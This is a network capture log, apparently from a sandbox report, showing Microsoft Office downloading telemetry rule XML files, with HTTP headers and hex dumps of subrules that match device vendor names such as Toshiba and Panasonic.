                                                                                                                                                                              2024-11-21 07:30:32 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              43192.168.2.64975413.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:32 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:32 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                              ETag: "0x8DC582B9D43097E"
                                                                                                                                                                              x-ms-request-id: 76e93f39-101e-0034-5559-3b96ff000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073032Z-178bfbc474btrnf9hC1NYCb80g00000001cg000000001vq3
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:32 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              44192.168.2.64975513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:32 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:32 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                              ETag: "0x8DC582BA909FA21"
                                                                                                                                                                              x-ms-request-id: bf14eb60-501e-007b-507b-3b5ba2000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073032Z-1777c6cb754wcxkwhC1TEB3c6w0000000aqg000000008rf0
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:32 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              45192.168.2.64975713.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:32 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:33 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                              ETag: "0x8DC582B92FCB436"
                                                                                                                                                                              x-ms-request-id: bf645307-501e-007b-7599-3b5ba2000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073033Z-r1d97b99577jlrkbhC1TEBq8d000000009x00000000098rg
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:33 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              46192.168.2.64975813.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:33 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:34 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:34 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 423
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                              ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                              x-ms-request-id: e0915331-401e-000a-1f8a-3b4a7b000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073034Z-r1d97b99577mrt4rhC1TEBftkc00000009ug00000000fqw0
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:34 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              47192.168.2.64975913.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:34 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:35 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:34 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 478
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                              ETag: "0x8DC582B9B233827"
                                                                                                                                                                              x-ms-request-id: 9f194ed4-601e-0070-357c-3ba0c9000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073034Z-1777c6cb754n67brhC1TEBcp9c0000000ax0000000002ybe
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:35 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              48192.168.2.64976013.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:34 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:34 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 404
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                              ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                              x-ms-request-id: d277967d-801e-0047-0163-3b7265000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073034Z-178bfbc474bbcwv4hC1NYCypys0000000130000000001u6h
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:35 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              49192.168.2.64976113.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:34 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:34 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                              ETag: "0x8DC582BB046B576"
                                                                                                                                                                              x-ms-request-id: f8feafe0-e01e-0020-2afa-3ade90000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073034Z-r1d97b99577sdxndhC1TEBec5n0000000a1g00000000kgwq
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:35 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              50192.168.2.64976313.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:35 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:35 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 400
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                              ETag: "0x8DC582BB2D62837"
                                                                                                                                                                              x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073035Z-r1d97b99577lxltfhC1TEByw2s0000000a0g00000000eqd8
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:35 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              51192.168.2.64976413.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:35 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:36 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 479
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                              ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                              x-ms-request-id: 171ae584-101e-005a-6763-3b882b000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073036Z-178bfbc474bpnd5vhC1NYC4vr4000000012000000000f3q3
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:36 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              52192.168.2.64976513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:36 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:37 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 425
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                              ETag: "0x8DC582BBA25094F"
                                                                                                                                                                              x-ms-request-id: c2180679-501e-008f-16bc-3b9054000000
                                                                                                                                                                              x-ms-version: 2018-03-28
